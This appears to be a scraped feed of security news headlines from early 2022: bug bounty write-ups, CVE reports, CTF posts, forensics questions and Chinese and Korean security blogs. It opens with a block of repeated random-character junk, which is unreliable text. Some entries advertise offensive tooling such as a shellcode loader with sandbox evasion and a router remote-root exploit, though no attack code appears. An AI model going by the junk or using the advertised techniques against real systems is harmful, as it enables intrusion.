hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X ​ From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
  • Open

    Ask HN: Vulnerability Research in 2032?
    Hi HN, I've always been curious about bug hunting. Finding vulns. I have some foundational knowledge like fuzzing, basic web security and reading assembly, but I am also aware of all the improvements in software and web security and there are so many new tech stacks, languages and platforms these days. Where does one begin? Is it worth learning how to find memory safety vulns given how C and friends are dying (and when they are alive things like CFG and appguard make it impossible to exploit them)? Are there any modern books or sites you recommend? Should I be leaning some language (rust/go?) or stack (k8s?) as a prerequisite? Comments URL: https://news.ycombinator.com/item?id=30324988 Points: 1 # Comments: 0  ( 1 min )
    Apple emits emergency fix for exploited-in-the-wild WebKit vulnerability
    Article URL: https://www.theregister.com/2022/02/11/apple_emergency_webkit/ Comments URL: https://news.ycombinator.com/item?id=30324643 Points: 4 # Comments: 3  ( 9 min )
  • Open

    SysWhispers Shellcode Loader w/ ETW patching, anti-sandboxing, and 6 execution options
    submitted by /u/ChadMotivation [link] [comments]
  • Open

    What is a Skip Tracer?
    Skip tracing is the process of tracking down people who are particularly hard to find, whether they’re persons-of-interest, fact witnesses… Continue reading on Medium »
    Creating a Honeypot
    First it’s important to describe what a honeypot is and why it’s a good idea to create on. In the cyber security field a honeypot is… Continue reading on Medium »  ( 9 min )
  • Open

    SecWiki News 2022-02-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Mostly big boobs photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    CTF中PHP相关题目考点总结(下)
    本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。  ( 2 min )
    CTF中PHP相关题目考点总结(上)
    本文总结了ctfshow题目中遇到的关于PHP的考点。  ( 2 min )
  • Open

    Widespread CSRF on authenticated POST endpoints
    UPchieve disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1309435
  • Open

    CVE-2021-45464 – LKVM Escape
    Article URL: https://www.kalmarunionen.dk/writeups/2021/hxp-2021/lkvm/ Comments URL: https://news.ycombinator.com/item?id=30320463 Points: 4 # Comments: 0  ( 11 min )
    The long road to a fix for CVE-2021-20316
    Article URL: https://lwn.net/SubscriberLink/884052/c946bb7f8d39c54e/ Comments URL: https://news.ycombinator.com/item?id=30319122 Points: 8 # Comments: 0  ( 16 min )

  • Open

    Biohazard- Tryhackme CTF
    This is a write-up about the Biohazard CTF room from Tryhackme (a free cybersecurity training site that provides machines for you to… Continue reading on Medium »  ( 8 min )
    Exploit SUID misconfiguration for privilege escalation
    In this article, I am going to explain what are SUID binaries how to exploit them for getting root shell i.e privilege escalation on the… Continue reading on Medium »  ( 2 min )
  • Open

    [h1-2102] Break permissions waterfall
    Shopify disclosed a bug submitted by hogarth45: https://hackerone.com/reports/1088159 - Bounty: $500
    Blind XSS on Twitter's internal Jira panel at allows exfiltration of hackers reports and other sensitive data
    Twitter disclosed a bug submitted by iambouali: https://hackerone.com/reports/1369674 - Bounty: $5040
  • Open

    My Pentest Log -6-
    Greetings Everyone from Hippodrome (Constantinople), Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 8
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web Technologies Knowledge required for starting with the web Exploitation Part-3
    Hello Hackers hope so You are doing well. I myself Manan Aggarwal a Btech Student is Here to Present you the blog in the continuation of… Continue reading on Medium »  ( 6 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways… Continue reading on Medium »  ( 2 min )
    Hacking My ISP For FREE Internet
    Note: This article is only for educational purpose. Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - BROKEN ACCESS CONTROL LAB ÇÖZÜMLERİ
    Access Control (Erişim Kontrolü) veya Authorization (Yetkilendirme), talep edilen eylemlere veya erişim kaynaklarına, kimin veya neyin… Continue reading on Medium »  ( 10 min )
    HOW I GOT THE BOUNTY OF $280+ in just a matter of seconds…
    Hey folks, Continue reading on Medium »  ( 2 min )
    Improving the impact of a mouse-related XSS with styling and CSS-gadgets
    I will write more about how I make PoCs in the future. But with special care, I work out scenarios for vulnerabilities that need user… Continue reading on Medium »  ( 2 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
    Bug Bounty: My First Five Figure Payout
    This is the post from my Telegram channel about Bug Bounty, where I share my experience and knowledge as well as just write about being… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-12 Review
    开源软件包与软件供应链安全漏洞修复分析研究 by ourren 攻防对抗的十八层地狱 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-12 Review
    开源软件包与软件供应链安全漏洞修复分析研究 by ourren 攻防对抗的十八层地狱 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    OSINT Automation Tool — Spiderfoot
    Spiderfoot Continue reading on Medium »  ( 1 min )
    Valerie vs Valoree
    Yes, this is really happening.  No, I’m not running to cause ballot confusion. Continue reading on Medium »  ( 1 min )
    How To Find Timestamps For Verification
    Finding exact timestamps in web material is a must-have ability for OSINT and verification researchers, but where do you look? Continue reading on Medium »
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
  • Open

    The Top 13 Ethical Hacking Courses on Udemy (2022)
    submitted by /u/Jan_Prince [link] [comments]
  • Open

    Technical documents for JOINT POLAR SATELLITE SYSTEM
    A little over my head but if any climate geeks want to access raw data, here's the tools. Main index directory: https://www.jpss.noaa.gov/assets/ Community Satellite Processing Package (open source direct broadcast): http://cimss.ssec.wisc.edu/cspp/ Example: https://www.jpss.noaa.gov/assets/pdfs/technical_documents/472-00340_J2_HRD_to_DBS_RF_ICD_Rev_C.pdf API references: https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-01_JPSS-API-Users-Guide-Vol-I_0123A.pdf https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-02_JPSS-API-Users-Guide-Vol-II_0124-.pdf submitted by /u/inoculatemedia [link] [comments]
    Audio and art programs (mostly) for Atari 2600
    http://www.qotile.net/files/ submitted by /u/inoculatemedia [link] [comments]
  • Open

    现代前后端分离式应用API渗透测试探究
    越来越多的国内互联网企业为了提高开发测试迭代速度以及前端统一的需求,搭上了前后端分离的快车。基于新的前端框架,如何更高效的进行API测试就变得越加重要。  ( 1 min )
    NodeJS堆溢出?原因是默认设限了内存上限。解除封印!
    使用NodeJS开发的应用,如果需要处理大量数据,可能导致堆溢出。错误提示中,会有“JavaScript heap out of memory”。
  • Open

    CISSP Domain 1 - Episode 5 - Security Roles and Responsibilities, Control Frameworks, Due care & Due Diligence, Policies, Standards, Procedures, Guidelines & Baseline and Threat Modeling by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    How do I get my foot in the door with forensics?
    I have my masters in digital forensics but like a fool I never did anything with it. I’m a quick study and will only take me about a week or two to relearn everything. I have a security clearance and currently with in government contracting as a project manager but no company is biting. I want to finally make the switch but it’s hard when you don’t have in lab experience or the certs. Any advice on how to get restarted in this field? TIA! submitted by /u/kindreddino [link] [comments]  ( 6 min )
    Imaging Android and iOS devices
    Hello, can anyone teach me how to image these devices. Or if you can point me to some tutorials. I have been trying to learn but I keep failing. Thanks in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
  • Open

    곧 Chrome에서 document.domain을 설정할 수 없습니다 ⚠️
    Chrome will disable modifying document.domain to relax the same-origin policy 구글에서 최근 document.domain에 대한 크롬 브라우저의 변경을 예고했습니다. 브라우저 3사는 서로 유사하게 정책을 가져가기 때문에 아마 firefox, safari도 비슷한 형태로 변화될 가능성이 높겠죠. 요약하자면 Chrome 106+ 이후부턴 기본적으로 document.domain에 대한 setter가 제거된다고 합니다. document.domain 사실 document.domain은 문제가 좀 있습니다. document.domain이 도메인의 포트 번호 부분을 무시하기 때문에 만약 동일한 도메인에서 포트가 다른 서비스로 서빙되는 경우 원래대로면 서로는 same-origin이 아니지만, document.
    ZAP의 새로운 Networking Stack
    지난 목요일 밤 ZAP Developers Groups에 simon이 한가지 내용을 공유했습니다. 바로 ZAP의 Networking Layer에 대한 이야기고, 저는 제목을 보자마자 어떤 내용인지 직감했습니다. (제가 정말 기다렸던 내용이거든요 🤩) Weekly 버전에선 networking stack이 달라졌어! 어떤 것을 개선하기 위해 이러한 작업이 진행되었는지, 그리고 어떻게 바뀌었고 앞으로 어떻게 될지 미리 살펴봅시다 :D Why? 먼저 Networking stack, layer는 실제로 사용자에게 보이는 부분은 별로 없습니다. Application 내부에서 네트워크를 처리하기 위한 부분인데, ZAP은 오래된 프로젝트다 보니 베이스로 사용된 Networking 부분이 오래된 Apache Commons HttpClient library를 사용했었습니다.
  • Open

    Apple fixes Mac battery drain, WebKit vulnerability in software updates
    Article URL: https://arstechnica.com/gadgets/2022/02/apple-patches-security-holes-and-bugs-with-ios-15-3-1-and-macos-12-2-1/ Comments URL: https://news.ycombinator.com/item?id=30308727 Points: 2 # Comments: 0  ( 3 min )

  • Open

    Simple tool to find client side prototype pollution vulnerability
    submitted by /u/boch33n [link] [comments]
    Pre-auth WAN remote root for Cisco RV340 VPN Gateway Router
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Cisco ASDM: Manage at Your Own Risk
    submitted by /u/chicksdigthelongrun [link] [comments]
    WordPress < 5.8.3 - Object Injection Vulnerability
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    A simple tool to audit Linux system libraries to find public security vulnerabilities.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/Margaruga [link] [comments]
    Internet-Wide Study: State Of SPF, DKIM, And DMARC - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]  ( 1 min )
  • Open

    Mellium 0.21.1 fixes CVE-2022-24968
    Article URL: https://mellium.im/cve/cve-2022-24968/ Comments URL: https://news.ycombinator.com/item?id=30308038 Points: 1 # Comments: 0  ( 1 min )
    Apple fixes actively exploited zero-day (CVE-2022-22620)
    Article URL: https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/ Comments URL: https://news.ycombinator.com/item?id=30304109 Points: 1 # Comments: 0  ( 3 min )
  • Open

    How safe is this obscure software my friend bought on eBay?
    My friend is having technical difficulties with his iPad (he reset it and you can’t get through the welcome/setup without allowing remote access management to a certain company, which he doesn’t want to do) and he bought some software on eBay that promises to help bypass that error. His computer is old and won’t run the software when he tries to. My MacBook is brand new and so he asked me if I could download the eBay software onto my computer to try to fix the iPad. To me that doesn’t seem like something I want to download onto my new laptop. Maybe I shouldn’t have binged all of the darknet diaries podcast but idk doesn’t feel safe. Here’s what it looks like. Any thoughts? submitted by /u/aimhighswinglow [link] [comments]  ( 4 min )
    Is is safe to feed patterns to hashing functions in order to create passwords for websites?
    I had this idea on how to generate supposedly safe passwords for different websites/accounts that wouldn't require passwords to be memorized or stored. The idea is to 1 - Come up with a short default string that would never change (say, "bubly42") 2 - Append the name of the website to that string for each website you make an account. For example, when creating an account for airbnb it'd produce the string "bubly42airbnb" 3 - Run that string (bubly42airbnb) through a hash function 4 - Use the output of the hash function as the password for the website This would have the upside of not requiring memorization or storage of passwords, while still generating a unique password for each site. I can just generate the password on the fly. Obvious downside is that if someone figures your pattern out, they pretty much can figure out all of your passwords. Is there anything else that I'm missing? Is this considered safe? (Btw, sorry if I'm posting on the wrong place. If that's the case, can someone direct me to a good subreddit to post this in?) submitted by /u/djoncho [link] [comments]  ( 4 min )
    Possible malware in official Torguard windows VPN client ??
    Torguard's VPN client intermittently consumes 50% cpu, for long periods, unrelated to any network activity, which I find suspicious. Details below. I've raised this with TG's tech support who have repeatedly denied that any such behavior exists. I'm seeing this consistently on 4 windows machines (including one VM) where I have TG running. I'm not sure where to report this as there is no TG subreddit and the VPN subreddit doesn't allow mentioning specific services. Hopefully you folks can point me in the right direction or give advice. So, if the app is running and the VPN is connected, even if there are no other apps open, TG client will randomly begin consuming a constant 50% CPU. I can't correlate this with any other condition like network traffic or other app activity or any obvious thing TG is doing. If I minimize the TG client window, it stops. And then it starts again in a few minutes, and so I repeat this remedy, and it stops. If I don't do this it continues indefinitely. So, every computer this is running on experiences a significant heat/wattage increase and CPU performance degradation due to TG. I took screenshots of this behavior using task manager. I also watched it using winternals' process monitor, which gave much more detailed info than this. ---- But this forum doesn't allow pictures. submitted by /u/Dougolicious [link] [comments]  ( 2 min )
    How to get over the unrecognized app/publisher warning in Windows
    All, I am writing an executable to put on a website for download. Every time I go to download it, I get an "unrecognized app, unknown publisher warning". It's not tagged as malicious, but it's tagged as "unknown publisher" which makes it appear that way. Does anyone know how to add a publisher? Is that something a non-corporation can do? Or could I at least add a certificate or something to make Windows calm down? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    How to get access on clean-mx.de
    Correct me if I am on the wrong subreddit, I have seen some people talk about this site in here, but how do you get access on clean-mx? I tried creating an account in there(registration form), but I haven't got a response back, unless I am being impatient. I also tried contacting the email, but it is dead as stated in the site. There is multiple sites to register accounts, xlogin.php, xregister.php, etc etc. I can see it's alive because when I search the site up, I see the dates from right now. ​ Is this site restricted to companies only or not? Can you not register anymore? ​ (couldnt post this in a other subreddit, my post kept getting removed because they thought it was a tech-support question) submitted by /u/RainbowIsRainbow [link] [comments]  ( 1 min )
    What are the security monitoring can accomplish these scanning and detection?
    Hi Folks, As the title says, what tools can help to achieve these objectives Real time scan the network to detect presence of unauthorized hardware, software, and firmware components within the network. To scan and detect in real- time the addition of devices into network and notify the security administrator via email. submitted by /u/techno_it [link] [comments]  ( 3 min )
    Pen test dropbox running Win OS with Kali VM - with 4G callback
    Looking for some hardware advice for a pen test dropbox. I'd like the unit to be responsive with desktop-speed chipsets, x86/x64 based, and have an out-of-band 4G SIM callback for when client networks prevent outbound connectivity. With Windows as the primary OS, is there any way to auto connect the 4G/cellular modem with Windows, as there is with Linux (ie wvdial)? Are there any capable NUC type devices or mini PCs with inbuilt 4G capability. Want to avoid having USB modems sticking out the side, perhaps similar to rPi's cellular hat, but not rPi (or other SBCs) which would struggle with a Win with Kali VM setup. Happy to spend a bit on hardware, are there many notable boxes other than the Intel NUC, Zotac Zbox or MSI Cubi? Seen a few decent build docs that almost fit the bill, but not quite: https://infosecwriteups.com/part-2-build-the-pen-test-drop-box-69278526886a https://www.blackhillsinfosec.com/pentesting-dropbox-on-steroids/ https://www.blackhillsinfosec.com/how-to-build-your-own-penetration-testing-drop-box/ https://www.sprocketsecurity.com/blog/penetration-testing-dropbox-setup-part1 Thanks! submitted by /u/ama21n [link] [comments]  ( 1 min )
    Would a "technical support specialist" be a good start to eventually end up in cyber security?
    Hello. I'm graduating college soon and have an offer as a support specialist. The responsibilities are as follows: Provide 1st-tier technical support for production support issues Troubleshoot system errors by reviewing technical logs, system documentation, and application logic Monitor and triage errors generated by automated tasks in production Collaborate with Client Excellence team to ensure users’ technical support issues are resolved quickly On call rotation for urgent production issues during weekends and holidays I've been applying to IT jobs but have had little luck. Would a job like this be a good interdiction into security? Or should I look for a more traditional IT job? submitted by /u/Hellothere6667 [link] [comments]  ( 1 min )
  • Open

    LNK Files, Again
    What, again?!?! I know, right?!? Not long ago, I read this fascinating article from Joe Helle that discussed malicious uses for Windows shortcuts, or LNK files, and also discussed a Python3 scripts called "lnkbomb". As a side note, check out what Joe had to share about persistence via WSL2! As anyone who's followed me for a minute knows, I love...L   O   V   E...me some LNK files. Shortcut files are something that we see all the time, have been around for a long time (much like ADSs), but folks in the DFIR field are so focused on the "shiny hot newness", that this file type is very often overlooked and not fully exploited. The technique Joe discusses is similar to modifying the iconfilename field of a shortcut file, so that even if the "bad guy" is evicted from an infrastructure, any action that launches the LNK file results in credentials being passed via HTTP or WebDAV, where they can be collected, cracked, and then used by the threat actor. LNK files have a lot of uses, and understanding the format and structure is helpful in a lot of different ways. One example is that automatic JumpLists follow the OLE/structured storage format, and all but the DestList stream consist of LNK file formatted streams. Another example is that the building blocks of LNK files, shell items, are also the core building blocks of several Registry-based artifacts, such as shellbags. Beyond that, however, threat actors have used LNK files as lures in social engineering and phishing attacks; this means that the threat actor has built the LNK files within their own infrastructure, within their own development environment. As such, sending these files as lures is "free money" to both DFIR and CTI analysts, if they're able to leverage those files and their component metadata. So...while I know Windows 11 is out, and everyone's excited about the shiny new hotness, let's not forget that there's a lot that has worked since Windows XP (or even prior to that) and still continues to be an issue today.  ( 4 min )
  • Open

    How to Choose a Security Plugin That’s Right for Your Website
    Finding the perfect security plugin for your website is important, but it’s also crucial you find the proper one that suits your needs. WordPress plugins are a dime a dozen, so we’ll be discussing how to narrow your options and what to look for in a reliable plugin so you can safely install it on your website. Some of the most frequent issues with poorly managed plugins include eating up memory in excess, 500 internal server errors, downtime, white pages, and slow response times. Continue reading How to Choose a Security Plugin That’s Right for Your Website at Sucuri Blog.
  • Open

    Honeypot OSINT
    In this post I will be going through the open source intelligence process I went through following an attack performed against my honeypot. Continue reading on Medium »  ( 8 min )
    Building a public OSINT lab target
    The Utah Valley University Cyber Security Program needed a realistic target that students could use to learn OSINT and offensive tools… Continue reading on Medium »  ( 1 min )
    [EN] TryHackMe 25 Days of Cyber Security: Day 14 Walkthrough
    [Day 14] OSINT Where’s Rudolph? Continue reading on Medium »  ( 3 min )
    Tallin To Search More Churches — OSINT Challenge 14
    On Dec 27, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken. Please… Continue reading on Medium »  ( 1 min )
  • Open

    Adding customers to victim’s store via Insecure Direct Object Reference
    Hello! I am back with my 2nd bug bounty write up. This time I’ll be showing you how I found an Insecure Direct Object Reference bug on an… Continue reading on Medium »  ( 1 min )
    QRCDR Path Traversal Vulnerability
    QRCDR is a popular PHP — JavaScript QR-Code Generator, which is widely used for creating customized QR-Code in easy steps. also, it’s used… Continue reading on Medium »  ( 2 min )
    Hacking ticketastic
    Hi guys! I’m back with another great blog, with this blog you can learn more about SQLi and Cross Site Request Forgery (CSRF). Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 7
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web technologies required for starting with the web Exploitation Part-2
    Hello Myself Manan Aggarwal is here to present the Blog about the Basic Web technologies required for starting with the web Exploitation… Continue reading on Medium »  ( 4 min )
    Introduction to Spring Boot Related Vulnerabilities
    Spring Boot related vulnerability learning materials, collection of utilization methods and skills, black box security assessment checklist Continue reading on Medium »  ( 12 min )
    iOS jailbreak dev wins $2M bounty for finding critical Optimism bug
    Continue reading on Medium »  ( 2 min )
    VulnLab SQL Injection— Dynamic Application Security Testing #3
    Assalamualaikum Wr.Wb Continue reading on Medium »  ( 6 min )
  • Open

    Amcache SHA-1 mismatch
    Hoping someone has seen this or has an idea what may be happening. I am performing a review and identified an installer file as an item of interest. I see the file in the host’s Amcache hive with a SHA-1 (“A”) hash. However, the recovered file has a different SHA-1 hash on disk (“B”). When running the executable on my test system and comparing it to that test machine’s Amcache, I see the same behavior. Amcache has hash “A” and the executable has hash “B.” Every other program I’ve sampled has hash matches; it seems like just this one is off. What gives? For specifics, I am using RegistryExplorer and Amcache Parser (both Zimmerman tools) for Amcache analysis. I am hashing with both X-Ways and Hasher (also Zimmerman). When reviewing Amcache Parser, I am matching the hash to the executable …  ( 3 min )
    Does anyone have Magnet Acquire download link without filling the form?
    I can't afford the axiom (or whatever it is called) so can anyone provide me the link? Thank you so much! submitted by /u/Hopelessssssssss [link] [comments]  ( 1 min )
    Announcing Opensource X-Ways HashExporter Extension
    This opensource extension allows you to dump all the hashes from an image using X-Ways command-line. https://github.com/PolitoInc/X-Ways-HashExporter-Extension submitted by /u/Alarming_Arm_7724 [link] [comments]  ( 1 min )
    What program should I specialize in if I cannot chose digital forensics?
    Computer Science and Engineering with specialisation in Blockchain Technology Computer Science and Engineering with specialisation in Information Technology Computer Science and Engineering with specialisation in Data Science. Or does it not matter as long as it is Csc ? submitted by /u/nodogsareevil [link] [comments]  ( 1 min )
    What transferable skills does forensics provide?
    I am currently a digital forensic analyst of both phones and computers for law enforcement. I want to transition into a new tech role, such as infosec or another form of cyber sec but looking at the job specs for 90% of these roles I do not meet the requirements. I’m considering self funding a cert such as CISSP or Security+ as this will most likely help. What sort of jobs can my current role land me in? submitted by /u/gofigured21 [link] [comments]  ( 3 min )
    CHFI Content Weightage
    Hello, Can we guess the content weightage of CHFI in the actual exam? I mean how can we know which modules will have more questions and other modules will have fewer questions in exam? I need to take the test and the book is very lengthy that can't be read as a whole so I want to get info about modules' weightage so I can learn them first (which will have more questions in the exam) and then the remaining modules (which have fewer questions). If not exactly any guess about it? submitted by /u/hardfire005 [link] [comments]  ( 1 min )
    Learning DFIR?
    Hi everyone. I am eJPT certified and been doing tryhackme for a year now. I want to move towards blue side, especially forensics and incident response. What i wanna ask is what is best resource/website to learn dfir/soc etc Is CHFI course content good? Are elearn security forensics and incident response courses and certs valuable? Or should i stick with tryhackme (it has less content regarding blue teaming) I have also heard of securityblueteam so is the investment there invaluable? Thanks submitted by /u/Nightkinnng [link] [comments]  ( 1 min )
  • Open

    CALISHOT 2022-02: Find ebooks among 348 Calibre sites this month
    submitted by /u/krazybug [link] [comments]  ( 1 min )
    archaeological dig photos from Iraq
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    [q] Index template/website script
    Hi guys, I hope this is the correct place to ask; I want to make a website where I can index certain posts and urls. (like a blog but easier) could you please guide me? ​ tyvm submitted by /u/zuperfly [link] [comments]  ( 1 min )
    A way to clone an Open Directory?
    Is there a can clone/upload all the files from an OD to my shared google drive? i know about rclone but since it's not easy to use, i don't want to waste time with it if can't do the required task. + Is there a tool that can upload a shared google drive file to my shared drive? again, i know about "make a copy option" but that is not usable if the file is over the size of the free space you drive has. submitted by /u/CompetitiveMango12 [link] [comments]  ( 2 min )
  • Open

    Discoverability by phone number/email restriction bypass
    Twitter disclosed a bug submitted by zhirinovskiy: https://hackerone.com/reports/1439026 - Bounty: $5040
    Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1423704 - Bounty: $100
    Information Exposure Through Directory Listing vulnerability
    Nextcloud disclosed a bug submitted by technorat: https://hackerone.com/reports/1476709
  • Open

    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    🔥🔥 A new version 0.1.3 released for Kubesploit: a post-exploitation framework for Kubernetes🔥🔥
    submitted by /u/kubiscan [link] [comments]
    Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-02-11 Review
    [HTB] Love Writeup by 0x584a PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法 by ourren 自动机器学习的安全风险 by ourren 解构开源IAST 打造安全灰盒利器 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-11 Review
    [HTB] Love Writeup by 0x584a PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法 by ourren 自动机器学习的安全风险 by ourren 解构开源IAST 打造安全灰盒利器 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 上海一程序员删库跑路被判10个月;500家电商网站被植入信用卡窃取程序
    一名29岁的程序员录某未经公司许可,在离职当天,私自将即将上线的京东到家平台系统代码全部删除。  ( 1 min )
    Fake dnSpy - 这鸡汤里下了毒!
    dnSpy是一款流行的用于调试、修改和反编译.NET程序的工具。网络安全研究人员在分析.NET程序或恶意软件时经常使用。  ( 1 min )
    黑客攻击欧洲港口石油设施致油价飙升、上海首份《企业数据合规指引》出台、微软计划收购网络安全公司|网络安全周报
    2022年2月7日至2月11日共收录全球网络安全热点8项,涉及微软、Mandiant、Puma、Swissport等。  ( 1 min )
    法国监管机构称谷歌分析存在数据隐私风险
    法国监管机构认为,该项服务在数据传输时没有采取足够的措施保障数据隐私权,可被美国情报机构利用。
    Kimsuky 正在使用 xRAT 进行窃密
    近日,ASEC 分析人员发现 Kimsuky 组织正在使用 xRAT(基于 Quasar RAT 定制的开源 RAT)恶意软件。  ( 1 min )
    Arid Viper APT 组织针对巴勒斯坦发起攻击
    Arid Viper 组织利用最初发布在土耳其国营通讯社 Anadolu 和巴勒斯坦 MAAN 发展中心的内容为诱饵,针对巴勒斯坦的机构发起攻击。  ( 1 min )
    FreeBuf周报 | 超50万人受Morley勒索软件攻击影响;黑客攻击欧洲港口石油设施
    商业服务公司Morley Companies披露了一起用户数据泄露事件,大量用户数据被窃取。  ( 1 min )
    浦发银行信用卡中心诚聘信息安全工程师
    上海浦东发展银行信用卡中心诚聘信息安全工程师。
    工信部就《工业和信息化领域数据安全管理办法(试行)》再次征求意见
    《管理办法》共八章四十一条,并强调重要数据和核心数据应按照相应法律、法规在境内存储,或依法依规进行数据出境安全评估。  ( 1 min )
    浅谈musl堆利用技巧(DEBUG篇)
    最近比赛出的musl题型的越来越多,不得不学习一波musl的堆利用来应对今后的比赛。  ( 1 min )
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    How to crack RSA-512 on off-the-shelf hardware in 4 days
    submitted by /u/ScottContini [link] [comments]
    Five Vulnerabilities Explained in Moxa MXview for OT Networks
    submitted by /u/h4ck3dit [link] [comments]
    Safer entropy accumulation in Linux 5.18's RNG
    submitted by /u/zx2c4 [link] [comments]  ( 1 min )
    what is Walkme Extension used for? I have it installed and enforced by default without ability to disable it - in all Chrome browsers on the work laptop...
    submitted by /u/One-World-One-Love [link] [comments]  ( 1 min )
    🇬🇧 Gaining the upper hand(le) - Hunting for privilege escalations and UAC bypasses by looking for leaked handles in unprivileged processes by @APTortellini and @last0x00
    submitted by /u/last0x00 [link] [comments]  ( 1 min )
    Firejail oopsie
    submitted by /u/MonkeeSage [link] [comments]
  • Open

    Fuzzing for XSS via nested parsers condition
    Article URL: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ Comments URL: https://news.ycombinator.com/item?id=30292426 Points: 1 # Comments: 0  ( 5 min )
  • Open

    CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module Since 4.8
    Article URL: https://www.openwall.com/lists/oss-security/2022/02/10/1 Comments URL: https://news.ycombinator.com/item?id=30291958 Points: 2 # Comments: 0  ( 6 min )
  • Open

    MakerDAO Launches $10m Bug Bounty On Immunefi
    Immunefi has grown by leaps & bounds since we first launched in December 2020 and now protects over $100 billion (that’s Billion with a B)… Continue reading on Immunefi »  ( 2 min )
    Programming languages and Cybersecurity
    Codes are fundamental blocks of logic which drives businesses all around the world today. Continue reading on Medium »  ( 6 min )
    100 Days of Hacking - Day 6
    Objectives of day 6 : Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — Day 5
    Objectives of day 5 : Continue reading on Medium »  ( 1 min )
    Launching Superfluid Bug Bounty Program with Immunefi
    Our mission to establish the Superfluid Protocol as a key component of the financial rails of the future requires more than technological… Continue reading on Superfluid Blog »  ( 3 min )
    Buy any Products For Free From Bewakoof.com || Bug-Bounty $$
    Hi, Here we will see how you can buy any product for free from Bewakoof.com Continue reading on Medium »  ( 2 min )
    Internet-Wide Study: State Of SPF, DKIM, And DMARC — RedHunt Labs
    At RedHunt Labs, (under Project Resonance), we frequently conduct internet-wide research in different shapes and formats to understand the… Continue reading on Medium »  ( 7 min )
    كيف حصلت على 2500 دولار من اكتشاف الثغرات
    السلام عليكم ورحمة الله وبركاته Continue reading on Medium »  ( 1 min )
  • Open

    Are there only 2 types of people in this world? — An OSINT analysis
    Today as I was scrolling through my LinkedIn’s home feed I came across this image that had been liked by someone from my network. Continue reading on Medium »  ( 3 min )
